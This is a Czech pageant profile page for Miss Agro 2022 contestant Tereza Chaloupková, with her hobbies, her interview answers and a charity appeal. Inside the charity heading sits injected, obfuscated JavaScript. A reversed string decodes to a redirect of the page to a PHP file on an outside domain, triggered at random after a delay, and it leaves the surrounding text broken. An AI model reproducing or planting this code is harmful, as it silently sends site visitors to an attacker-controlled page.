Tereza Chaloupková

Profil

Fotografie

Fakulta: PEF
Obor: Ekonomika a management
Ročník: 4.
Věk:
22

Tereza je energická dvaadvacetiletá blondýnka, která miluje černý humor, dobré jídlo a cestování. Ve volném čase tančí salsu, bruslí a hraje na saxofon. Sama o sobě s úsměvem prohlašuje, že nejdříve mluví a pak myslí, což ji velmi často přivádí do problémů, ale jak sama říká problém je jen další výraz pro život a ten Tereza miluje se vším, co k němu patří.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2022?

Jsem hodně ukecaná, kamarádi říkají, že mluvím i ze spaní, a tak se velmi často stane, že mám máslo na hlavě právě kvůli tomu, co za perlu jsem zase řekla. Myslím si, že koruna by byla oproti máslu příjemná změna a navíc mám málo vlasů, takže by mi dobře sedla na hlavu. (úsměv)

Kdybys v soutěži vyhrála dovolenou snů, jak bys chtěla, aby vypadala?

Určitě bych jela někam do tepla k moři, ale nejsem typ člověka, který by si užíval „válecí“ dovolenou, takže ideálně aktivní dovolená u moře a čím dál, tím líp, miluju totiž lítání.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

ČZU je jediná škola v Praze, kde můžu studovat ekonomiku a zároveň v mezičase chodit krmit kozy a dívat se na opice. Nejradši mám lidi, ať už to jsou kamarádi, které jsem si tu našla, nebo učitelé s kterými jsem se setkala, ale abych pravdu řekla, tohle je pro mě těžká otázka, protože tady je spousta dalších věcí, které mám ráda.